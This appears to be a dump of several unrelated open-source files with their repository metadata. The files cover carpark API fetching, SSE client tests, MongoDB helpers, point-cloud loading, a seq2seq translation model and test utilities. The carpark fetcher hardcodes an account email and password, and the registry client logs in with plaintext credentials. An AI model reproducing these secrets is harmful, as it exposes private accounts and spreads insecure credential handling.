split(4, 3, 'L5<=L2-1') #split t10 <= t4-1
tile(4, 5, TK1, 3)
tile(4, 5, TJ1, 4)
datacopy([[4,1]], 4, false, 1)
datacopy([[4,2]], 5)
unroll(4, 5, UI1)
unroll(4, 6, UJ1)
datacopy([[5,1]], 3, false, 1)
# now optimize for MM
TK2 = 256
TI2 = 256
TJ2 = 8
UI2 = 1
UJ2 = 1
tile(1, 4, TK2, 2)
tile(1, 3, TI2, 3)
tile(1, 5, TJ2, 4)
datacopy([[1,1]], 4, false, 1)
datacopy([[1,2]], 5)
unroll(1, 5, UI2)
unroll(1, 6, UJ2)
print_code()
| 17.204082
| 52
| 0.578885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.26809
|
8bb882a476b7069df7988169620b13ea93893010
| 2,204
|
py
|
Python
|
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | null | null | null |
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | null | null | null |
dj_vercereg/client/vercereg_client.py
|
davidath/dj-vercereg
|
d1ae1dba21cab93c759ecf79346bc60c2d88d7a8
|
[
"Apache-2.0"
] | 1
|
2022-03-14T13:33:19.000Z
|
2022-03-14T13:33:19.000Z
|
#!/usr/bin/env python
# Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import curses
import collections
import argparse
import datetime
import logging
logging.basicConfig()
logger = logging.getLogger('DJREG_CLIENT')
logger.setLevel(logging.INFO)
from vercereg_lib import VerceRegManager
class VerceRegClient:
HISTORY_LENGTH = 5000
history = None
manager = None
def __init__(self):
self.history = collections.deque(maxlen=self.HISTORY_LENGTH)
self.manager = VerceRegManager()
def main():
# TODO: Define and implement commands for the client
# parser = argparse.ArgumentParser(description='Client for the VERCE Registry.')
# parser.add_argument('command', metavar='Command', type=str,
# help='a VERCE Registry command')
manager = VerceRegManager()
manager.login('iraklis', 'iraklis')
logger.info(manager.get_auth_token())
# manager.login('admin', 'admin')
# logger.info(manager.get_auth_token())
# manager.clone(1, 'cloned_wspc'+'@'.join(str(datetime.datetime.now()).split()))
# logger.info(manager.get_pe_spec(1, 'pes', 'MyPE'))
# logger.info(manager.get_pe_spec(1, 'fns', 'Fn1')) # should raise an exception
manager.delete_pe_spec(1, 'libpck', 'LibPE11')
new_pe = manager.register_pe_spec(1, 'libpck', 'LibPE11', descr='Some description for a test PE')
new_conn = manager.add_pe_connection(str(new_pe['id']), kind='IN', name='CnName', stype='str', dtype='DTYPE', comment='My comment', is_array=True, modifiers='one:two')
manager.add_pe_connection(str(new_pe['id']), kind='OUT', name='outconn')
if __name__ == '__main__':
main()
| 32.895522
| 169
| 0.720054
| 204
| 0.092559
| 0
| 0
| 0
| 0
| 0
| 0
| 1,305
| 0.592105
|
8bb96428aea103e57829628f8aba75da646487e4
| 6,803
|
py
|
Python
|
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | 2
|
2020-02-26T03:28:02.000Z
|
2020-04-25T07:03:36.000Z
|
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | null | null | null |
scripts/DailyJob/api_data_fetcher.py
|
SamFangshan/CZ2006CarPark
|
663b0370e7d2e0cbe4d0a7391656a731fc7dac52
|
[
"MIT"
] | null | null | null |
import json
import pandas as pd
import numpy as np
from urllib.request import Request, urlopen
from onemap_converter import OneMapConverter
def load_HDB_carpark():
converter = OneMapConverter('FJIANG003@e.ntu.edu.sg', 'XS4teTdcYz')
# Load HDB Carpark Information
url_HDB_carpark = 'https://data.gov.sg/api/action/datastore_search?resource_id=139a3035-e624-4f56-b63f-89ae28d4ae4c&limit={}'
req_HDB_carpark = Request(url_HDB_carpark.format(1), headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_carpark = urlopen(req_HDB_carpark).read()
data_HDB_carpark = json.loads(webpage_HDB_carpark.decode())
no_rec = data_HDB_carpark['result']['total'] # number of HDB Carpark Records
url_HDB_carpark = 'https://data.gov.sg/api/action/datastore_search?resource_id=139a3035-e624-4f56-b63f-89ae28d4ae4c&limit={}'
req_HDB_carpark = Request(url_HDB_carpark.format(no_rec), headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_carpark = urlopen(req_HDB_carpark).read()
data_HDB_carpark = json.loads(webpage_HDB_carpark.decode())
# Load HDB Carpark Lots Information
url_HDB_lots_info = 'https://api.data.gov.sg/v1/transport/carpark-availability'
req_HDB_lots_info = Request(url_HDB_lots_info, headers={'User-Agent': 'Mozilla/5.0'})
webpage_HDB_lots_info = urlopen(req_HDB_lots_info).read()
data_HDB_lots_info = json.loads(webpage_HDB_lots_info.decode())
# Load HDB Carpark Information into Pandas Data Frame
short_term_parking = [data_HDB_carpark['result']['records'][i]['short_term_parking'] for i in range(no_rec)]
car_park_type = [data_HDB_carpark['result']['records'][i]['car_park_type'] for i in range(no_rec)]
x_coord = [data_HDB_carpark['result']['records'][i]['x_coord'] for i in range(no_rec)]
y_coord = [data_HDB_carpark['result']['records'][i]['y_coord'] for i in range(no_rec)]
coord = [(x_coord[i], y_coord[i]) for i in range(no_rec)]
coord = [converter.convert(float(coord[i][0]), float(coord[i][1])) for i in range(no_rec)]
x_coord = [coord[i][0] for i in range(no_rec)]
y_coord = [coord[i][1] for i in range(no_rec)]
free_parking = [data_HDB_carpark['result']['records'][i]['free_parking'] for i in range(no_rec)]
gantry_height = [data_HDB_carpark['result']['records'][i]['gantry_height'] for i in range(no_rec)]
car_park_basement = [data_HDB_carpark['result']['records'][i]['car_park_basement'] for i in range(no_rec)]
night_parking = [data_HDB_carpark['result']['records'][i]['night_parking'] for i in range(no_rec)]
address = [data_HDB_carpark['result']['records'][i]['address'] for i in range(no_rec)]
car_park_decks = [data_HDB_carpark['result']['records'][i]['car_park_decks'] for i in range(no_rec)]
car_park_no = [data_HDB_carpark['result']['records'][i]['car_park_no'] for i in range(no_rec)]
type_of_parking_system = [data_HDB_carpark['result']['records'][i]['type_of_parking_system'] for i in range(no_rec)]
HDB_carpark = {
'carParkNo': car_park_no,
'address': address,
'xCoord': x_coord,
'yCoord': y_coord,
'carParkType': car_park_type,
'typeOfParkingSystem': type_of_parking_system,
'shortTermParking': short_term_parking,
'freeParking': free_parking,
'nightParking': night_parking,
'carParkDecks': car_park_decks,
'gantryHeight': gantry_height,
'carParkBasement': car_park_basement,
}
HDB_carpark = pd.DataFrame.from_dict(HDB_carpark)
# Load HDB Carpark Lots Information into Pandas Data Frame
HDB_lots_info = {}
for record in data_HDB_lots_info['items'][0]['carpark_data']:
carpark_info = record['carpark_info']
car_lot_num = 0
motor_lot_num = 0
heavy_lot_num = 0
for i in range(len(carpark_info)):
if carpark_info[i]['lot_type'] == 'C':
car_lot_num = carpark_info[i]['total_lots']
elif carpark_info[i]['lot_type'] == 'Y':
motor_lot_num = carpark_info[i]['total_lots']
elif carpark_info[i]['lot_type'] == 'L':
heavy_lot_num = carpark_info[i]['total_lots']
try:
if HDB_lots_info[record['carpark_number']][1] == 0:
HDB_lots_info[record['carpark_number']][1] = car_lot_num
if HDB_lots_info[record['carpark_number']][2] == 0:
HDB_lots_info[record['carpark_number']][2] = motor_lot_num
if HDB_lots_info[record['carpark_number']][3] == 0:
HDB_lots_info[record['carpark_number']][3] = heavy_lot_num
except:
HDB_lots_info[record['carpark_number']] = [record['carpark_number'], car_lot_num, motor_lot_num, heavy_lot_num]
HDB_lots_info = dict(zip(range(len(HDB_lots_info)), HDB_lots_info.values()))
columns = ['carParkNo', 'carLotNum', 'motorLotNum', 'heavyLotNum']
HDB_lots_info = pd.DataFrame.from_dict(HDB_lots_info, orient='index', columns=columns)
# Merge two Pandas Data Frames
HDB_carpark = pd.merge(HDB_carpark, HDB_lots_info, on='carParkNo', how='inner')
# Provide rates information
# Information Source:
# https://www.hdb.gov.sg/cs/infoweb/car-parks/short-term-parking/short-term-parking-charges
central = ['HLM', 'KAB', 'KAM', 'KAS', 'PRM', 'SLS', 'SR1', 'SR2', 'TPM', 'UCS']
loading = ['GSML', 'BRBL', 'JCML', 'T55', 'GEML', 'KAML', 'J57L', 'J6OL', 'TPL', 'EPL', 'BL8L']
car_rates = '$0.60 per half-hour'
motor_rates = '$0.20 per half-hour'
heavy_rates = '$1.20 per half-hour'
central_rates = """$1.20 per half-hour
(7:00am to 5:00pm, Monday to Saturday)
$0.60 per half hour
(Other hours)
"""
loading_rates = """Free - First 15 minutes
$2 - first half hour
$4 - subsequent half hour
"""
HDB_carpark['carRates'] = np.where(pd.to_numeric(HDB_carpark['carLotNum']) != 0, car_rates, None)
HDB_carpark['carRates'] = np.where(np.isin(HDB_carpark['carParkNo'], central), central_rates, HDB_carpark['carRates'])
HDB_carpark['motorRates'] = np.where(pd.to_numeric(HDB_carpark['motorLotNum']) != 0, motor_rates, None)
HDB_carpark['heavyRates'] = np.where(pd.to_numeric(HDB_carpark['heavyLotNum']) != 0, heavy_rates, None)
HDB_carpark['carRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['carRates'])
HDB_carpark['motorRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['motorRates'])
HDB_carpark['heavyRates'] = np.where(np.isin(HDB_carpark['carParkNo'], loading), loading_rates, HDB_carpark['heavyRates'])
return HDB_carpark
| 58.646552
| 129
| 0.66456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,228
| 0.327503
|
8bba17146d82323f502dee13164e2dcf746f9322
| 4,108
|
py
|
Python
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 13
|
2017-03-17T15:15:20.000Z
|
2022-03-14T22:24:10.000Z
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 81
|
2017-01-12T23:06:48.000Z
|
2022-02-21T18:20:23.000Z
|
tests/push/test_sse.py
|
cfogg/python-client
|
40e6891c8240e6b2acd5df538e622e9f15de43d6
|
[
"Apache-2.0"
] | 14
|
2017-05-25T10:49:13.000Z
|
2021-12-27T16:39:20.000Z
|
"""SSEClient unit tests."""
import time
import threading
import pytest
from splitio.push.sse import SSEClient, SSEEvent
from tests.helpers.mockserver import SSEMockServer
class SSEClientTests(object):
"""SSEClient test cases."""
def test_sse_client_disconnects(self):
"""Test correct initialization. Client ends the connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
with pytest.raises(RuntimeError):
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
client.shutdown()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
server.publish(server.GRACEFUL_REQUEST_END)
server.stop()
def test_sse_server_disconnects(self):
"""Test correct initialization. Server ends connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
server.publish(server.GRACEFUL_REQUEST_END)
server.stop()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
def test_sse_server_disconnects_abruptly(self):
"""Test correct initialization. Server ends connection."""
server = SSEMockServer()
server.start()
events = []
def callback(event):
"""Callback."""
events.append(event)
client = SSEClient(callback)
def runner():
"""SSE client runner thread."""
assert client.start('http://127.0.0.1:' + str(server.port()))
client_task = threading.Thread(target=runner)
client_task.setDaemon(True)
client_task.setName('client')
client_task.start()
server.publish({'id': '1'})
server.publish({'id': '2', 'event': 'message', 'data': 'abc'})
server.publish({'id': '3', 'event': 'message', 'data': 'def'})
server.publish({'id': '4', 'event': 'message', 'data': 'ghi'})
time.sleep(1)
server.publish(server.VIOLENT_REQUEST_END)
server.stop()
time.sleep(1)
assert events == [
SSEEvent('1', None, None, None),
SSEEvent('2', 'message', None, 'abc'),
SSEEvent('3', 'message', None, 'def'),
SSEEvent('4', 'message', None, 'ghi')
]
assert client._conn is None
| 31.844961
| 73
| 0.547955
| 3,933
| 0.9574
| 0
| 0
| 0
| 0
| 0
| 0
| 940
| 0.228822
|
8bbca367e9908a584ebeb0ff48984d79eb8c67ba
| 859
|
py
|
Python
|
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
api_updater.py
|
jpes707/quiz-api
|
18af31b9cdba8927e4e7a38e0bd3623e938cf7dc
|
[
"MIT"
] | null | null | null |
import os
from mongo_config import questions_collection, client
def get_relative_path(*args):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), *args)
questions_collection.delete_many({}) # clears all questions in MongoDB
question_objects = []
lines = [line[:-1] for line in open(get_relative_path('trivia.txt'), 'r').readlines()] + ['']
for idx in range(0, len(lines), 6):
question = lines[idx]
correct_answer = lines[idx + 1]
wrong_answers = lines[idx + 2 : idx + 5]
choices = [correct_answer] + wrong_answers # not shuffled yet
question_object = {'question': question, 'correct_answer': correct_answer, 'choices': choices}
question_objects.append(question_object)
questions_collection.insert_many(question_objects) # puts all questions from txt file into MongoDB
client.close()
print('Questions updated!')
| 37.347826
| 99
| 0.733411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.197905
|
8bbcec0ab14f44786258536c11d18bbc453834f6
| 2,429
|
py
|
Python
|
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
util.py
|
AndreasWieg/PC-BIGAN
|
0738f9bf56bd30b43eb2db9765ce9bae25ca81f6
|
[
"MIT"
] | null | null | null |
import numpy as np
import random
from plyfile import PlyData, PlyElement
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from pyntcloud import PyntCloud
import os
import sys
import re
def shuffle_data(training_data):
np.random.shuffle(training_data)
return training_data
def save_pointcloud(leaf,counter,leaf_name,number_points):
leaf = np.asarray(leaf)
leaf = np.reshape(leaf,(number_points,3))
leaf_final = []
x = 0
for e in enumerate(leaf):
leaf_final.append(tuple(leaf[x]))
x = x +1
vertex = np.array(leaf_final,dtype=[('x', 'f4'), ('y', 'f4'),('z', 'f4')])
el = PlyElement.describe(vertex, 'vertex')
PlyData([el]).write('%s_%d.ply' % (leaf_name,counter))
def load_data(number_points,reduction_step):
training_data = []
#counter = 1
for file in os.listdir("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % (reduction_step)):
if file.endswith(".ply"):
cloud = PyntCloud.from_file("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d/%s" % (reduction_step,file))
cloud_array = np.asarray(cloud.points)
training_data.append(cloud_array)
return training_data
def load_data_table(number_points,reduction_step):
training_data = []
counter = 1
if not os.path.exists("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step):
os.mkdir("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step)
table_uri = ("C:/Users/Andreas/Desktop/PG-PGGAN/table_new_%d" % reduction_step)
print(table_uri)
for file in os.listdir("C:/Users/Andreas/Desktop/PG-PGGAN/table"):
if file.endswith(".ply"):
cloud = PyntCloud.from_file("C:/Users/Andreas/Desktop/PG-PGGAN/table/%s" % file)
cloud = cloud.get_sample(name="points_random",n = number_points)
cloud = PyntCloud(cloud)
cloud_array = np.asarray(cloud.points)
cloud.to_file(table_uri + "/out_file_%d.ply" % (counter))
counter = counter + 1
training_data.append(cloud_array)
else:
training_data = load_data(number_points,reduction_step)
print(len(training_data))
print("data loaded")
training_data = np.asarray(training_data)
print("getting Trainingdata into the right format")
#training_data = training_data.reshape(8509,3072)
print(training_data.shape)
print(" trainingdata formated")
return training_data
| 37.369231
| 107
| 0.691231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 555
| 0.228489
|
8bbd00b53513bf84f5c58a5ce90fbc7b1806da00
| 7,474
|
py
|
Python
|
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
seq_to_seq.py
|
jlibovicky/char-nmt-two-step-decoder
|
3fa90c38556f23568f6b88eb98e4bc2193f3b744
|
[
"BSD-3-Clause"
] | null | null | null |
"""Encoder-decoder model."""
from typing import List, Tuple, Union
import torch
import torch.nn as nn
from encoder import Encoder, VanillaEncoder
from decoder import Decoder, VanillaDecoder
T = torch.Tensor
def compute_attention_entropy(
att_matrix: T, query_mask: T) -> float:
# att matrix is: batch x heads x q_len x k_len
# first entropy of each distribution, non-existing key positions
# must be asked out
prenorm_entropies = -(torch.log(att_matrix) * att_matrix)
prenorm_entropies[prenorm_entropies.isnan()] = 0.0
distr_entropies = prenorm_entropies.sum(3)
# shape: batch x head x q_len
# now average over relevant query positions
batch_head_entropies = (
distr_entropies * query_mask.unsqueeze(1)).sum(2) / query_mask.sum()
return batch_head_entropies.mean(0).mean(0).cpu().numpy()
class Seq2SeqModel(nn.Module):
def __init__(
self, vocab_size: Union[int, Tuple[int, int]],
conv_filters: List[int],
nar_output: bool = False,
char_embedding_dim: int = 128,
dim: int = 512,
shrink_factor: int = 5,
charformer_block_size: int = 5,
highway_layers: int = 2,
char_ff_layers: int = 2,
ff_dim: int = None,
layers: int = 6,
attention_heads: int = 8,
dropout: float = 0.1,
char_process_type: str = "conv",
vanilla_encoder: bool = False,
vanilla_decoder: bool = False,
share_char_repr: bool = False) -> None:
super().__init__()
self.layers = layers
if isinstance(vocab_size, tuple):
src_vocab_size, tgt_vocab_size = vocab_size
else:
src_vocab_size, tgt_vocab_size = vocab_size, vocab_size
if vanilla_encoder:
self.encoder: Union[Encoder, VanillaEncoder] = VanillaEncoder(
char_vocabulary_size=src_vocab_size,
dim=dim,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
dropout=dropout)
else:
self.encoder = Encoder(
vocab_size=src_vocab_size,
char_embedding_dim=char_embedding_dim,
conv_filters=conv_filters,
dim=dim,
shrink_factor=shrink_factor,
charformer_block_size=charformer_block_size,
highway_layers=highway_layers,
char_ff_layers=char_ff_layers,
ff_dim=ff_dim, layers=layers,
attention_heads=attention_heads,
dropout=dropout,
decoder_style_padding=share_char_repr,
char_process_type=char_process_type)
if vanilla_decoder:
self.decoder: Union[Decoder, VanillaDecoder] = VanillaDecoder(
char_vocabulary_size=tgt_vocab_size,
dim=dim,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
dropout=dropout,
encoder=self.encoder if ( # type: ignore
share_char_repr and vanilla_encoder) else None)
else:
self.decoder = Decoder(
char_vocabulary_size=tgt_vocab_size,
char_embedding_dim=char_embedding_dim,
conv_filters=conv_filters,
nar_output=nar_output,
dim=dim,
shrink_factor=shrink_factor,
highway_layers=highway_layers,
char_ff_layers=char_ff_layers,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
char_process_type=char_process_type,
dropout=dropout,
encoder=self.encoder if # type: ignore
share_char_repr else None)
def forward(
self, src_batch: T, src_mask: T, tgt_batch: T, tgt_mask: T,
loss_function: nn.Module,
log_details: bool = False) -> Tuple[T, T]:
encoded, enc_mask, enc_attention = self.encoder(src_batch, src_mask)
loss, details = self.decoder(
encoded, enc_mask, tgt_batch, tgt_mask, loss_function,
log_details=log_details)
if log_details:
details["enc_attentions"] = enc_attention
details["enc_attention_entropies"] = [
compute_attention_entropy(att, enc_mask)
for att in enc_attention]
shrinked_mask = details["decoder_mask"]
details["dec_attention_entropies"] = [
compute_attention_entropy(att, shrinked_mask)
for att in details["decoder_self_attention"]]
details["encdec_attention_entropies"] = [
compute_attention_entropy(att, shrinked_mask)
for att in details["decoder_self_attention"]]
return loss, details
@torch.no_grad()
def greedy_decode(
self, src_batch: T, input_mask: T,
eos_token_id: int, max_len: int = 400) -> Tuple[T, T]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
decoded, mask = self.decoder.greedy_decode(
encoder_states, encoded_mask, eos_token_id, max_len=max_len)
return decoded, mask
@torch.no_grad()
def sample(
self, src_batch: T, input_mask: T,
n_samples: int,
eos_token_id: int, max_len: int = 400) -> List[Tuple[T, T]]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
return [
self.decoder.greedy_decode(
encoder_states, encoded_mask, eos_token_id,
max_len=max_len,
sample=True)
for _ in range(n_samples)]
@torch.no_grad()
def beam_search(
self, src_batch: T, input_mask: T,
eos_token_id: int,
beam_size: int = 5,
len_norm: float = 0.5,
max_len: int = 400) -> Tuple[T, T]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
decoded, mask = self.decoder.beam_search(
encoder_states, encoded_mask, eos_token_id,
beam_size=beam_size, len_norm=len_norm, max_len=max_len)
return decoded, mask
@property
def char_level_param_count(self) -> int:
"""Number of parameters in character processing layers."""
relevant_parts = []
if hasattr(self.encoder, "embeddings"):
relevant_parts = [self.encoder.embeddings]
if isinstance(self.encoder, Encoder):
relevant_parts.append(self.encoder.char_encoder)
if isinstance(self.decoder, VanillaDecoder):
relevant_parts.append(self.decoder.transformer.embeddings)
else:
relevant_parts.extend([
self.decoder.nar_proj, self.decoder.output_proj])
if not self.decoder.nar_output:
relevant_parts.append(self.decoder.char_decoder_rnn)
if not self.decoder.char_embeddings not in relevant_parts:
relevant_parts.extend([
self.decoder.char_embeddings, self.decoder.char_encoder])
char_parameters = {
p for part in relevant_parts for p in part.parameters()}
return sum(p.numel() for p in char_parameters)
| 37.18408
| 77
| 0.596602
| 6,617
| 0.885336
| 0
| 0
| 2,434
| 0.325662
| 0
| 0
| 489
| 0.065427
|
8bbe4c37ae3a9b71342799d82ae3b600239ac59b
| 2,638
|
py
|
Python
|
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Rickard Armiento
#
# This file is part of a Python candidate reference implementation of
# the optimade API [https://www.optimade.org/]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pymongo
import threading
class Database(object):
def __init__(self):
self.client = pymongo.MongoClient()
self.db = self.client.optimade_test
def empty_database(self):
self.client.drop_database("optimade_test")
self.db = self.client.optimade_test
def collection_destroy_if_exists(self, coll):
self.db[coll].remove({})
if coll in self.db.list_collection_names():
self.db[coll].drop()
def insert(self, coll, data):
self.db[coll].insert_one(data)
def insert_many(self, coll, datas):
try:
x = self.db[coll].insert_many(datas)
except pymongo.errors.BulkWriteError as e:
print(e.details)
raise
def find(self, coll, query, projection=None, limit=None):
if projection is None or projection == []:
if limit is None:
return self.db[coll].find(query)
else:
return self.db[coll].find(query).limit(limit)
else:
if limit is None:
return self.db[coll].find(query, dict([(x, 1) for x in projection]))
else:
return self.db[coll].find(query, dict([(x, 1) for x in projection])).limit(limit)
def find_one(self, coll, query):
return self.db[coll].find_one(query)
def close(self):
self.client.close()
| 35.173333
| 97
| 0.674375
| 1,362
| 0.5163
| 0
| 0
| 0
| 0
| 0
| 0
| 1,228
| 0.465504
|
8bbe4fd060a6878adde13a88356535b7bfb0e331
| 29,288
|
py
|
Python
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | 1
|
2021-02-04T18:56:36.000Z
|
2021-02-04T18:56:36.000Z
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | 12
|
2021-02-05T22:01:10.000Z
|
2022-03-09T14:23:10.000Z
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | null | null | null |
import functools
import json as json_pkg # avoid conflict name with json argument employed for some function
import os
from distutils.version import LooseVersion
from typing import TYPE_CHECKING
from urllib.parse import urlparse
import mock
import requests
import requests.exceptions
from pyramid.httpexceptions import HTTPException
from pyramid.testing import DummyRequest
from pyramid.testing import setUp as PyramidSetUp
from webtest.app import AppError, TestApp # noqa
from webtest.response import TestResponse
from cowbird.app import get_app
from cowbird.constants import COWBIRD_ROOT, get_constant
from cowbird.services.service import Service
from cowbird.utils import (
CONTENT_TYPE_JSON,
USE_TEST_CELERY_APP_CFG,
SingletonMeta,
get_header,
get_settings_from_config_ini,
is_null,
null
)
# employ example INI config for tests where needed to ensure that configurations are valid
TEST_INI_FILE = os.path.join(COWBIRD_ROOT, "config/cowbird.example.ini")
TEST_CFG_FILE = os.path.join(COWBIRD_ROOT, "config/config.example.yml")
class TestAppContainer(object):
test_app = None # type: Optional[TestApp]
app = None # type: Optional[TestApp]
url = None # type: Optional[str]
if TYPE_CHECKING:
# pylint: disable=W0611,unused-import
from typing import Any, Callable, Collection, Dict, Iterable, List, Optional, Type, Union
from pyramid.request import Request
from cowbird.typedefs import (
JSON,
AnyCookiesType,
AnyHeadersType,
AnyResponseType,
CookiesType,
HeadersType,
SettingsType
)
from cowbird.utils import NullType
# pylint: disable=C0103,invalid-name
TestAppOrUrlType = Union[str, TestApp]
AnyTestItemType = Union[TestAppOrUrlType, TestAppContainer]
class TestVersion(LooseVersion):
"""
Special version supporting ``latest`` keyword to ignore safeguard check of :func:`warn_version` during development.
.. seealso::
Environment variable ``COWBIRD_TEST_VERSION`` should be set with the desired version or ``latest`` to evaluate
even new features above the last tagged version.
"""
__test__ = False # avoid invalid collect depending on specified input path/items to pytest
def __init__(self, vstring):
if isinstance(vstring, (TestVersion, LooseVersion)):
self.version = vstring.version
return
if vstring == "latest":
self.version = vstring # noqa
return
super(TestVersion, self).__init__(vstring)
def _cmp(self, other):
if not isinstance(other, TestVersion):
other = TestVersion(other)
if self.version == "latest" and other.version == "latest":
return 0
if self.version == "latest":
return 1
if other.version == "latest":
return -1
return super(TestVersion, self)._cmp(other)
class MockMagpieService(Service):
required_params = []
def __init__(self, settings, name, **kwargs):
super(MockMagpieService, self).__init__(settings, name, **kwargs)
self.event_users = []
self.event_perms = []
self.outbound_perms = []
def json(self):
return {"name": self.name,
"event_users": self.event_users,
"event_perms": self.event_perms,
"outbound_perms": self.outbound_perms}
def get_resource_id(self, resource_full_name):
pass
def user_created(self, user_name):
self.event_users.append(user_name)
